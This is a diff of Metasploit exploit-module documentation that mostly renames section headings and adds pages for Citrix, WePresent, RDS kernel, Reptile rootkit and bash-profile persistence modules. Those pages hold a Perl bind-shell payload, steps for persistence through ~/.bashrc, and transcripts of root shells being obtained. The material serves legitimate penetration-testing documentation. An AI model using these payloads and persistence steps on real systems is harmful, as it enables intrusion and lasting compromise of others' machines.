+[*] Generated payload: perl -MIO -e '$p=fork();exit,if$p;foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(LocalPort,4444,Reuse,1,Listen)->accept;$~->fdopen($c,w);STDIN->fdopen($c,r);while(<>){if($_=~ /(.*)/){system $1;}};'
+[!] No response to GET KdlZHSNjZQzdSCKAusgAnnbPvTMLhXRxiEydEotJP.xml request
+[*] Started bind TCP handler against 127.0.0.1:4444
+[*] Command shell session 1 opened (127.0.0.1:51106 -> 127.0.0.1:4444) at 2020-01-13 20:50:45 -0600
+[+] Deleted /netscaler/portal/templates/KdlZHSNjZQzdSCKAusgAnnbPvTMLhXRxiEydEotJP.xml
+[+] Deleted /var/tmp/netscaler/portal/templates/KdlZHSNjZQzdSCKAusgAnnbPvTMLhXRxiEydEotJP.xml.ttc2
+
+id
+uid=65534(nobody) gid=65534(nobody) groups=65534(nobody)
+```
+
+## Verification Steps
+
+1. Install the module as usual
+2. Start msfconsole
+3. Do: `use exploit/linux/http/citrix_dir_traversal_rce`
+4. Do: `set RHOSTS [IP]`
+5. Do: `set LHOST [IP]`
+6. Do: `set VERBOSE true`
+7. Do: `run`
+
+## Targets
+
+```
+Id  Name
+--  ----
+0   Python
+1   Unix Command
+```
+
+## Advanced options
+
+**ForceExploit**
+
+Override check result.
+
+## References
+
+1. <https://www.mdsec.co.uk/2020/01/deep-dive-to-citrix-adc-remote-code-execution-cve-2019-19781/>
+2. <https://www.exploit-db.com/exploits/47901>
+3. <https://www.exploit-db.com/exploits/47902>
@@ -1,4 +1,4 @@
-# Vulnerable Application
+## Vulnerable Application
 Utilizing the DCOS Cluster's Marathon UI, an attacker can create
 a docker container with the '/' path mounted with read/write
 permissions on the host server that is running the docker container.
@@ -155,7 +155,7 @@ in the DCOS cluster.
 - [ ] Verify it creates a docker container and it successfully runs
 - [ ] After a minute a session should be opened from the agent server

-## Example Output
+## Scenarios
 ```
 msf > use exploit/linux/http/dcos_marathon
 msf exploit(dcos_marathon) > set RHOST 192.168.0.9
@@ -1,4 +1,4 @@
-# Vulnerable Application
+## Vulnerable Application
 Utilizing Docker via unprotected tcp socket (2375/tcp, maybe 2376/tcp
 with tls but without tls-auth), an attacker can create a Docker
 container with the '/' path mounted with read/write permissions on the
@@ -85,7 +85,7 @@ to gain root access to the hosting server of the Docker container.
 - [ ] Verify it creates a Docker container and it successfully runs
 - [ ] After a minute a session should be opened from the Docker server

-## Example Output
+## Scenarios
 ```
 msf > use exploit/linux/http/docker_daemon_tcp
 msf exploit(docker_daemon_tcp) > set RHOST 192.168.66.23
@@ -10,7 +10,7 @@ Note: `cmd/unix/reverse_netcat` is the only payload that seems to work and is st
 4. Do: ```set LHOST [IP]```
 5. Do: ```exploit -j```

-## Sample Output
+## Scenarios

  ```
 msf > use use exploit/unix/http/epmp1000_get_chart_cmd_shell
@@ -12,7 +12,7 @@ Note: `cmd/unix/reverse_netcat` is the only payload that seems to work and is st
 4. Do: ```set LHOST [IP]```
 5. Do: ```exploit -j```

-## Sample Output
+## Scenarios

  ```
 msf > use use exploit/unix/http/epmp1000_ping_cmd_shell
@@ -9,7 +9,7 @@ Refer to: https://www.exploit-db.com/exploits/36807/

 NOTE: GoAutoDial heavily restricts inbound traffic via iptables rules (and uses fail2ban, as well).  This can cause bind payloads to quietly fail.  For bind payloads, using ports which allow inbound connections but have no service running is ideal (ports 21 and 222 fall into this category for default GoAutoDial behavior).

-## Verification
+## Verification Steps

 - Start `msfconsole`
 - Do `use exploit/linux/http/goautodial_3_rce_command_injection`
@@ -1,4 +1,4 @@
-# Vulnerable Application
+## Vulnerable Application

 Nagios XI 5.5.6 Root Remote Code Execution

@@ -14,7 +14,7 @@ The exploit works as follows:
 - Download Nagios XI 5.5.6 from the official website (https://www.nagios.com/downloads/nagios-xi/older-releases/).
 - Follow the official instructions to install it on your Ubuntu VM (https://assets.nagios.com/downloads/nagiosxi/docs/Installing-Nagios-XI-Manually-on-Linux.pdf).

-# Verification Steps
+## Verification Steps

 1. `use exploit/linux/http/nagios_xi_root_rce`
 2. `set RHOSTS [IP]`
@@ -23,7 +23,7 @@ The exploit works as follows:

 A meterpreter session should have been opened successfully and you should be root

-# Options
+## Options

 ## RSRVHOST

@@ -41,7 +41,7 @@ IP of your local HTTPS server (must be a local IP).

 Port to listen to for your local HTTPS server.

-# Scenarios
+## Scenarios

 ## Nagios 5.5.6 on Ubuntu 18.04 LTS

@@ -13,7 +13,7 @@ Netgear DGN1000 with firmware versions up to `1.1.00.48` and DGN2000v1 models
  5. Do : `run`
  6. If router is vulnerable, payload should be dropped via wget and executed, and therein should obtain an session

-## Scenarious
+## Scenarios

 Sample output of a successfull exploitation should be look like this :

@@ -1,4 +1,4 @@
-## Background
+## Vulnerable Application

 The 'pineapple_bypass_cmdinject' exploit attacks a weak check for
 pre-authorized CSS files, which allows the attacker to bypass
@@ -9,7 +9,7 @@ This exploit uses a utility function in
 /components/system/configuration/functions.php to execute commands once
 authorization has been bypassed.

-## Verification
+## Verification Steps

 This exploit requires a "fresh" pineapple, flashed with version 2.0-2.3. The
 default options are generally effective due to having a set state after being
@@ -1,4 +1,4 @@
-## Background
+## Vulnerable Application

 This module uses a challenge solver exploit which impacts two possible states
 of the device: pre-password set and post-password set. The pre-password set
@@ -16,7 +16,7 @@ This exploit uses a utility function in
 /components/system/configuration/functions.php to execute commands once
 authorization has been bypassed.

-## Verification
+## Verification Steps

 This exploit requires a "fresh" pineapple, flashed with version 2.0-2.3. The
 default options are generally effective due to having a set state after being
@@ -1,4 +1,4 @@
-# Vulnerable Application
+## Vulnerable Application
 Utilizing Rancher Server, an attacker can create a docker container
 with the '/' path mounted with read/write permissions on the host
 server that is running the docker container. As the docker container
@@ -107,7 +107,7 @@ Advanced Options
 - [ ] Verify it creates a docker container and it successfully runs 
 - [ ] After a minute a session should be opened from the agent server

-## Example Output
+## Scenarios
 ```
 msf > use exploit/linux/http/rancher_server
 msf exploit(rancher_server) > set RHOST 192.168.91.111
@@ -47,7 +47,7 @@ Samsung NVR Recorder SRN-1670D is a hardware:

 http://www.samsungcc.com.au/cctv/ip-nvr-solution/samsung-dvr-srn-1670d

-## Scenario
+## Scenarios

 ```
 msf exploit(samsung_srv_1670d_upload_exec) > show options 
@@ -3,7 +3,7 @@
 This module exploits an unauthenticated command execution vulnerability in Apache Spark with standalone cluster mode through REST API.
 It uses the function CreateSubmissionRequest to submit a malious java class and trigger it.

-## Vulnerable Application 
+## Verification Steps

 https://github.com/vulhub/vulhub/tree/master/spark/unacc 

@@ -78,7 +78,7 @@ Set this to `true` to override the `check` result during exploitation.
 ## Usage

 ```
-msf5 exploit(unix/webapp/webmin_backdoor) > run
+msf5 exploit(linux/http/webmin_backdoor) > run

 [*] Started reverse TCP handler on 172.28.128.1:4444
 [*] Webmin 1.890 detected
@@ -95,9 +95,9 @@ uname -a
 Linux ubuntu-xenial 4.4.0-141-generic #167-Ubuntu SMP Wed Dec 5 10:40:15 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
 ^Z
 Background session 1? [y/N]  y
-msf5 exploit(unix/webapp/webmin_backdoor) > set target 1
+msf5 exploit(linux/http/webmin_backdoor) > set target 1
 target => 1
-msf5 exploit(unix/webapp/webmin_backdoor) > run
+msf5 exploit(linux/http/webmin_backdoor) > run

 [*] Started reverse TCP handler on 172.28.128.1:4444
 [*] Webmin 1.890 detected
@@ -0,0 +1,96 @@
+## Vulnerable Application
+
+This module exploits [CVE-2019-3929](https://nvd.nist.gov/vuln/detail/CVE-2019-3929). The vulnerability affects [WePresent](https://www.barco.com/en/page/wepresent) devices, as well as many OEM devices (listed below). The vulnerability is an unauthenticated remote command injection via HTTP POST request to the /cgi-bin/file_transfer.cgi endpoint. 
+
+The following devices are known to be affected by this issue:
+
+* Barco wePresent WiPG-1000P <= 2.3.0.10
+* Barco wePresent WiPG-1600W <= 2.4.1.19
+* Crestron AM-100 <= 1.6.0.2
+* Crestron AM-101 <= 2.7.0.1
+* Extron ShareLink 200/250 <= 2.0.3.4
+* Teq AV IT WIPS710 <= 1.1.0.7
+* InFocus LiteShow3 <= 1.0.16
+* InFocus LiteShow4 <= 2.0.0.7
+* Optoma WPS-Pro <= 1.0.0.5
+* Blackbox HD WPS <= 1.0.0.5
+* SHARP PN-L703WA <= 1.4.2.3
+
+## Verification Steps
+
+  1. Acquire one of the vulnerable devices.
+  2. Start msfconsole
+  3. Do: `use exploit/linux/http/wepresent_cmd_injection`
+  4. Do: `set RHOSTS <device ip>`
+  5. Do: `check`
+  6. The module should indicate if the target is vulnerable or not.
+  7. Do: `set LHOST <ip>`
+  8. Do: run
+  9. A meterpreter session should be started
+
+## Scenarios
+
+### Tested against Crestron AM-100 1.6.0.2 
+
+#### Meterpreter
+
+```
+msf5 > use exploit/linux/http/wepresent_cmd_injection 
+msf5 exploit(linux/http/wepresent_cmd_injection) > set RHOSTS 10.12.70.246
+RHOSTS => 10.12.70.246
+msf5 exploit(linux/http/wepresent_cmd_injection) > set LHOST 10.12.70.238
+LHOST => 10.12.70.238
+msf5 exploit(linux/http/wepresent_cmd_injection) > check
+[+] 10.12.70.246:443 - The target is vulnerable.
+msf5 exploit(linux/http/wepresent_cmd_injection) > run
+
+[*] Started reverse TCP handler on 10.12.70.238:4444 
+[*] Command Stager progress -   9.95% done (127/1276 bytes)
+[*] Command Stager progress -  19.98% done (255/1276 bytes)
+[*] Command Stager progress -  29.94% done (382/1276 bytes)
+[*] Command Stager progress -  39.97% done (510/1276 bytes)
+[*] Command Stager progress -  50.00% done (638/1276 bytes)
+[*] Command Stager progress -  59.95% done (765/1276 bytes)
+[*] Command Stager progress -  69.75% done (890/1276 bytes)
+[*] Command Stager progress -  79.62% done (1016/1276 bytes)
+[*] Command Stager progress -  89.50% done (1142/1276 bytes)
+[*] Sending stage (904600 bytes) to 10.12.70.246
+[*] Command Stager progress - 100.08% done (1277/1276 bytes)
+[*] Command Stager progress - 101.33% done (1293/1276 bytes)
+[*] Meterpreter session 1 opened (10.12.70.238:4444 -> 10.12.70.246:40805) at 2020-01-09 05:53:34 -0500
+
+meterpreter > shell
+Process 31774 created.
+Channel 1 created.
+uname -a
+Linux Crestron.AirMedia-1.1.wm8750 2.6.32.9-default #30 Wed Jul 12 13:56:45 CST 2017 armv6l GNU/Linux
+```
+
+#### Busybox/Telnetd Bind Shell
+
+```
+msf5 > use exploit/linux/http/wepresent_cmd_injection 
+msf5 exploit(linux/http/wepresent_cmd_injection) > set target 0
+target => 0
+msf5 exploit(linux/http/wepresent_cmd_injection) > set payload cmd/unix/bind_busybox_telnetd 
+payload => cmd/unix/bind_busybox_telnetd
+msf5 exploit(linux/http/wepresent_cmd_injection) > set RHOSTS 10.12.70.246
+RHOSTS => 10.12.70.246
+msf5 exploit(linux/http/wepresent_cmd_injection) > set LHOST 10.12.70.238
+LHOST => 10.12.70.238
+msf5 exploit(linux/http/wepresent_cmd_injection) > check
+[+] 10.12.70.246:443 - The target is vulnerable.
+msf5 exploit(linux/http/wepresent_cmd_injection) > run
+
+[*] Started bind TCP handler against 10.12.70.246:4444
+[*] Command shell session 1 opened (10.12.70.238:41457 -> 10.12.70.246:4444) at 2020-01-09 05:56:36 -0500
+
+whoami
+whoami
+root
+~/boa/cgi-bin # uname -a
+uname -a
+Linux Crestron.AirMedia-1.1.wm8750 2.6.32.9-default #30 Wed Jul 12 13:56:45 CST 2017 armv6l GNU/Linux
+~/boa/cgi-bin # 
+```
+
@@ -23,13 +23,9 @@

  * Linux Mint 17.3 (x86_64)
  * Linux Mint 18 (x86_64)
+  * Ubuntu 16.04 (x86_64)
  * Ubuntu 16.04.2 (x86_64)

-  With kernel versions:
-
-  * 4.4.0-45-generic
-  * 4.4.0-51-generic
-

 ## Verification Steps

@@ -67,6 +63,19 @@
  and fall back to uploading a pre-compiled binary.


+## Compiled Executable
+
+The module makes use of a pre-compiled exploit executable to be
+used when `gcc` is not available on the target host for live compiling,
+or `COMPILE` is set to `False`.
+
+The executable was cross-compiled with [musl-cross](https://s3.amazonaws.com/muslcross/musl-cross-linux-6.tar).
+
+```bash
+./x86_64-linux-musl-gcc -o chocobo_root -s -pie -static chocobo_root.c
+```
+
+
 ## Scenarios

  ```
@@ -0,0 +1,50 @@
+## Description
+
+  This module establishes persistence via the Linux Bash profile method.
+  This module makes two changes to the target system.
+  First, the module writes a payload to a directory (`/var/temp/` by default).
+  Second, the module writes a payload execution trigger to the Bash profile (`~/.bashrc` by default).
+  The persistent payload is executed whenever the victim user opens a Bash terminal.
+
+## Vulnerable Application
+
+  This module has been tested successfully on:
+
+  * Ubuntu 19 (x86_64) running GNU bash, version 5.0.3(1)-release
+
+## Verification Steps
+
+  1. Start `msfconsole`
+  2. Get a Meterpreter session
+  3. `use exploit/linux/local/bash_profile_persistence`
+  4. `set SESSION [SESSION]`
+  5. `run`
+  6. On victim, open a new Bash terminal
+  7. You should get a new session with the permissions of the exploited user account
+
+## Options
+
+  **BASH_PROFILE**
+
+  The path to the target Bash profile. (default: `~/.bashrc`)
+
+  **PAYLOAD_DIR**
+
+  A writable directory file system path. (default: `/var/tmp`)
+
+## Scenarios
+
+```
+msf5 > use exploit/linux/local/bash_profile_persistence
+msf5 exploit(linux/local/bash_profile_persistence) > set SESSION 1
+msf5 exploit(linux/local/bash_profile_persistence) > exploit
+
+[*] Bash profile exists: /home/user/.bashrc
+[*] Bash profile is writable: /home/user/.bashrc
+[*] Created backup Bash profile: /root/.msf4/logs/persistence/192.168.1.191_20191128.130945_Bash_Profile.backup
+[*] Writing '/var/tmp/IgHypGLMglheQ' (126 bytes) ...
+[+] Wrote payload trigger to Bash profile
+[!] Payload will be triggered when target opens a Bash terminal
+[!] Don't forget to start your handler:
+[!] msf> handler -H 0.0.0.0 -P 4444 -p cmd/unix/reverse_python
+```
@@ -7,16 +7,16 @@
  The target system must be compiled with `CONFIG_BPF_SYSCALL`
  and must not have `kernel.unprivileged_bpf_disabled` set to 1.

+  Note, this module will overwrite the first few lines
+  of `/etc/crontab` with a new cron job. The job will
+  need to be manually removed.
+

 ## Vulnerable Application

  This module has been tested successfully on:

  * Ubuntu 16.04 (x64) kernel 4.4.0-21-generic (default kernel)
-  * Ubuntu 16.04 (x64) kernel 4.4.0-38-generic
-  * Ubuntu 16.04 (x64) kernel 4.4.0-42-generic
-  * Ubuntu 16.04 (x64) kernel 4.4.0-98-generic
-  * Ubuntu 16.04 (x64) kernel 4.4.0-140-generic

  This module was not tested against, but may work against:

@@ -1,8 +1,10 @@
-## Description
+## Vulnerable Application

-This modules exploits a vulnerability in Cisco Prime Infrastructure's runrshell binary. The runrshell binary is meant to execute a shell script as root, but can be abused to inject extra commands in the argument, allowing you to execute anything as root. It was originally discovered by Pedro Ribeiro, and chained in the CVE-2018-15379 exploit.
+This modules exploits a vulnerability in Cisco Prime Infrastructure's runrshell binary. The runrshell binary is meant to execute
+a shell script as root, but can be abused to inject extra commands in the argument, allowing you to execute anything as root.
+It was originally discovered by Pedro Ribeiro, and chained in the CVE-2018-15379 exploit.

-## Demo
+## Scenarios

 ```
 msf5 exploit(linux/local/cpi_runrshell_priv_esc) > run
@@ -19,4 +21,3 @@ meterpreter > getuid
 Server username: uid=0, gid=0, euid=0, egid=0
 meterpreter > 
 ```
-
@@ -1,4 +1,4 @@
-# Vulnerable Application
+## Vulnerable Application

 Exim 4.87 - 4.91 Local Privilege Escalation

@@ -15,7 +15,7 @@ Be careful if you use the exim package from the official repo of your Linux dist

 Before using the exploit, make sure exim is actually listening on a port (it may sound stupid, but I struggled a bit when creating a testing environment). However, you should not have any problem if you use the Docker image linked above.

-# Verification Steps
+## Verification Steps

 1. `use exploit/linux/local/exim4_deliver_message_priv_esc`
 2. `set SESSION [session]`
@@ -24,7 +24,7 @@ Before using the exploit, make sure exim is actually listening on a port (it may
 5. `set LPORT [lport]`
 6. `exploit`

-# Options
+## Options

 ## PAYLOAD

@@ -47,7 +47,7 @@ Timeout per send/expect when communicating with exim.
 A directory where we can write files (default is /tmp).


-# Scenarios
+## Scenarios

 ## Privilege escalation starting with a meterpreter shell

@@ -0,0 +1,129 @@
+## Description
+
+  This module attempts to gain root privileges on Linux systems by abusing
+  a NULL pointer dereference in the `rds_atomic_free_op` function in the
+  Reliable Datagram Sockets (RDS) kernel module (rds.ko).
+
+  Successful exploitation requires the RDS kernel module to be loaded.
+  If the RDS module is not blacklisted (default); then it will be loaded
+  automatically.
+
+  This exploit supports 64-bit Ubuntu Linux systems, including distributions
+  based on Ubuntu, such as Linux Mint and Zorin OS.
+
+  Target offsets are available for:
+
+  Ubuntu 16.04 kernels 4.4.0 <= 4.4.0-116-generic; and
+  Ubuntu 16.04 kernels 4.8.0 <= 4.8.0-54-generic.
+
+  This exploit does not bypass SMAP. Bypasses for SMEP and KASLR are included.
+  Failed exploitation may crash the kernel.
+
+
+## Vulnerable Application
+
+  This module has been tested successfully on various 4.4 and 4.8 kernels.
+
+
+## Verification Steps
+
+  1. Start `msfconsole`
+  2. Get a session
+  3. `use exploit/linux/local/rds_atomic_free_op_null_pointer_deref_priv_esc`
+  4. `set SESSION <SESSION>`
+  5. `check`
+  6. `run`
+  7. You should get a new *root* session
+
+
+## Options
+
+  **SESSION**
+
+  Which session to use, which can be viewed with `sessions`
+
+  **WritableDir**
+
+  A writable directory file system path. (default: `/tmp`)
+
+  **COMPILE**
+
+  Options: `Auto` `True` `False` (default: `Auto`)
+
+  Whether the exploit should be live compiled with `gcc` on the target system,
+  or uploaded as a pre-compiled binary.
+
+  `Auto` will first determine if `gcc` is installed to compile live on the system,
+  and fall back to uploading a pre-compiled executable.
+
+
+## Scenarios
+
+### Ubuntu 16.04 kernel 4.8.0-51-lowlatency #54~16.04.1-Ubuntu
+
+  ```
+  msf5 > use exploit/linux/local/rds_atomic_free_op_null_pointer_deref_priv_esc 
+  msf5 exploit(linux/local/rds_atomic_free_op_null_pointer_deref_priv_esc) > set session 1
+  session => 1
+  msf5 exploit(linux/local/rds_atomic_free_op_null_pointer_deref_priv_esc) > set verbose true
+  verbose => true
+  msf5 exploit(linux/local/rds_atomic_free_op_null_pointer_deref_priv_esc) > check
+
+  [+] System architecture x86_64 is supported
+  [+] Linux kernel 4.8.0-51-lowlatency #54~16.04.1-Ubuntu is vulnerable
+  [+] SMAP is not enabled
+  [+] LKRG is not installed
+  [+] grsecurity is not in use
+  [+] rds.ko kernel module is loaded
+  [*] The target appears to be vulnerable.
+  msf5 exploit(linux/local/rds_atomic_free_op_null_pointer_deref_priv_esc) > set lhost 172.16.191.165
+  lhost => 172.16.191.165
+  msf5 exploit(linux/local/rds_atomic_free_op_null_pointer_deref_priv_esc) > run
+
+  [*] Started reverse TCP handler on 172.16.191.165:4444 
+  [+] System architecture x86_64 is supported
+  [+] Linux kernel 4.8.0-51-lowlatency #54~16.04.1-Ubuntu is vulnerable
+  [+] SMAP is not enabled
+  [+] LKRG is not installed
+  [+] grsecurity is not in use
+  [+] rds.ko kernel module is loaded
+  [+] gcc is installed
+  [*] Live compiling exploit on system...
+  [*] Writing '/tmp/.zwl2ezPl' (250 bytes) ...
+  [*] Launching exploit (timeout: 30)...
+  [*] Transmitting intermediate stager...(126 bytes)
+  [*] Sending stage (3021284 bytes) to 172.16.191.206
+  [*] Meterpreter session 2 opened (172.16.191.165:4444 -> 172.16.191.206:48130) at 2019-12-21 02:22:40 -0500
+  [+] Deleted /tmp/.aCNiWb9vps
+  [+] Deleted /tmp/.zwl2ezPl
+  [*] Linux RDS rds_atomic_free_op NULL pointer dereference local root (CVE-2018-5333)
+  [*] [.] checking kernel version...
+  [*] [.] kernel version '4.8.0-51-lowlatency #54~16.04.1-Ubuntu' detected
+  [*] [~] done, version looks good
+  [*] [.] checking system...
+  [*] [~] done, looks good
+  [*] [.] mapping null address...
+  [*] [~] done, mapped null address
+  [*] [.] KASLR bypass enabled, getting kernel base address
+  [*] [.] trying /proc/kallsyms...
+  [*] [-] kernel base not found in /proc/kallsyms
+  [*] [.] trying syslog...
+  [*] [.] done, kernel text:   ffffffffa7c00000
+  [*] [.] commit_creds:        ffffffffa7ca6ed0
+  [*] [.] prepare_kernel_cred: ffffffffa7ca72e0
+  [*] [.] mmapping fake stack...
+  [*] [~] done, fake stack mmapped
+  [*] [.] executing payload 0x4027f7...
+  [*] [+] got root
+
+  meterpreter > getuid 
+  Server username: uid=0, gid=0, euid=0, egid=0
+  meterpreter > sysinfo
+  Computer     : 172.16.191.206
+  OS           : Ubuntu 16.04 (Linux 4.8.0-51-lowlatency)
+  Architecture : x64
+  BuildTuple   : x86_64-linux-musl
+  Meterpreter  : x64/linux
+  meterpreter > 
+  ```
+
@@ -17,10 +17,10 @@

  1. Start `msfconsole`
  2. Get a session
-  3. `use exploit/linux/local/rds_priv_esc`
-  4. `set SESSION [SESSION]`
-  5. `check`
-  6. `run`
+  3. Do: ```use exploit/linux/local/rds_rds_page_copy_user_priv_esc```
+  4. Do: ```set SESSION [SESSION]```
+  5. Do: ```check```
+  6. Do: ```run```
  7. You should get a new *root* session


@@ -62,12 +62,12 @@ The executables were cross-compiled with [musl-cross](https://s3.amazonaws.com/m
 ## Scenarios

  ```
-  msf5 > use exploit/linux/local/rds_priv_esc
-  msf5 exploit(linux/local/rds_priv_esc) > set session 1
+  msf5 > use exploit/linux/local/rds_rds_page_copy_user_priv_esc
+  msf5 exploit(linux/local/rds_rds_page_copy_user_priv_esc) > set session 1
  session => 1
-  msf5 exploit(linux/local/rds_priv_esc) > set lhost 172.16.191.188
+  msf5 exploit(linux/local/rds_rds_page_copy_user_priv_esc) > set lhost 172.16.191.188
  lhost => 172.16.191.188
-  msf5 exploit(linux/local/rds_priv_esc) > run
+  msf5 exploit(linux/local/rds_rds_page_copy_user_priv_esc) > run

  [*] Started reverse TCP handler on 172.16.191.188:4444 
  [*] Writing '/tmp/.zEAOL.c' (7282 bytes) ...
@@ -90,3 +90,13 @@ The executables were cross-compiled with [musl-cross](https://s3.amazonaws.com/m
  meterpreter > 
  ```

+## Re-exploitation
+
+The exploit C code utilizes a defined send (`5555`) and receive (`6666`) port, which are opened while the payload is active.
+Attempt to re-exploit while a successful exploit payload is open will result in the error:
+
+```
+[*] Could not bind socket.
+```
+
+However, killing that payload will allow for the exploit to run successfully.
@@ -0,0 +1,81 @@
+## Description
+
+  This module uses Reptile rootkit's `reptile_cmd` backdoor executable
+  to gain root privileges using the `root` command.
+
+
+## Vulnerable Application
+
+  [Reptile](https://github.com/f0rb1dd3n/Reptile) is a Linux Kernel Module (LKM) rootkit.
+
+  The `reptile_cmd` utility, installed to `/reptile` by default, permits elevating privileges
+  to root using the `root` argument.
+
+  This module has been tested successfully with Reptile from `master` branch (2019-03-04) on:
+
+  * Ubuntu 18.04.3 (x64)
+  * Linux Mint 19 (X64)
+
+
+## Verification Steps
+
+  1. Start `msfconsole`
+  2. Get a session
+  3. `use exploit/linux/local/reptile_rootkit_reptile_cmd_priv_esc`
+  4. `set SESSION [SESSION]`
+  5. `check`
+  6. `run`
+  7. You should get a new *root* session
+
+
+## Options
+
+  **REPTILE_CMD_PATH**
+
+  Path to `reptile_cmd` executable (default: `/reptile/reptile_cmd`)
+
+  **WritableDir**
+
+  A writable directory file system path. (default: `/tmp`)
+
+
+## Scenarios
+
+### Ubuntu 18.04.3 (x64)
+
+  ```
+  msf5 > use exploit/linux/local/reptile_rootkit_reptile_cmd_priv_esc 
+  msf5 exploit(linux/local/reptile_rootkit_reptile_cmd_priv_esc) > set session 1
+  session => 1
+  msf5 exploit(linux/local/reptile_rootkit_reptile_cmd_priv_esc) > set verbose true
+  verbose => true
+  msf5 exploit(linux/local/reptile_rootkit_reptile_cmd_priv_esc) > check
+
+  [+] /reptile/reptile_cmd is executable
+  [*] Output: uid=0(root) gid=0(root) groups=0(root)
+  [+] Reptile is installed and loaded
+  [+] The target is vulnerable.
+  msf5 exploit(linux/local/reptile_rootkit_reptile_cmd_priv_esc) > run
+
+  [*] Started reverse TCP handler on 172.16.191.165:4444 
+  [+] /reptile/reptile_cmd is executable
+  [*] Output: uid=0(root) gid=0(root) groups=0(root)
+  [+] Reptile is installed and loaded
+  [*] Writing '/tmp/.Q53XrrJ3RFy' (207 bytes) ...
+  [*] Executing payload...
+
+  [*] Transmitting intermediate stager...(106 bytes)
+  [*] Sending stage (985320 bytes) to 172.16.191.166
+  [*] Meterpreter session 3 opened (172.16.191.165:4444 -> 172.16.191.166:56736) at 2019-12-08 03:19:01 -0500
+
+  meterpreter > getuid
+  Server username: uid=0, gid=0, euid=0, egid=0
+  meterpreter > sysinfo
+  Computer     : 172.16.191.166
+  OS           : Ubuntu 18.04 (Linux 5.0.0-25-generic)
+  Architecture : x64
+  BuildTuple   : i486-linux-musl
+  Meterpreter  : x86/linux
+  meterpreter > 
+  ```
+
@@ -17,7 +17,7 @@ docker pull redis
 docker run -p 6379:6379 -d --name redis_slave redis
 ```

-## Options   
+## Options

 - CUSTOM

@@ -1,11 +1,9 @@
-## Description
+## Vulnerable Application

 This module exploits a vulnerability found in AwindInc and OEM'ed products where untrusted inputs are fed to `ftpfw.sh` system command, leading to command injection.

 Note: a valid SNMP read-write community is required to exploit this vulnerability.

-## Vulnerable Devices
-
 The following devices are known to be affected by this issue:

 * Crestron Airmedia AM-100 <= version 1.5.0.4
@@ -18,7 +16,7 @@ The following devices are known to be affected by this issue:

 Other devices might be affected by the same issue but lack of access to firmware forbids me from confirming that. See https://github.com/QKaiser/awind-research for full list of similar devices.

-## Verification steps
+## Verification Steps

 1. Start `msfconsole`
 2. Do: `use exploit/linux/snmp/awind_snmp_exec`
@@ -66,8 +64,3 @@ Architecture : armv6l
 BuildTuple   : armv5l-linux-musleabi
 Meterpreter  : armle/linux
 ```
-
-## References
-
-* https://github.com/QKaiser/awind-research
-* https://qkaiser.github.io/pentesting/2019/03/27/awind-device-vrd/
@@ -15,6 +15,7 @@
  8. You should get a session

 ## Options
+
  **FILEPATH**  
  The location to write the executable out to on the target. Needs to be writable by the SNMP service user. This defaults to /tmp.  
  
@@ -37,7 +38,7 @@


  
-## Scenario
+## Scenarios

  ```
  msf > use exploit/linux/snmp/net_snmpd_rw_access 
--- a/Show More
+++ b/Show More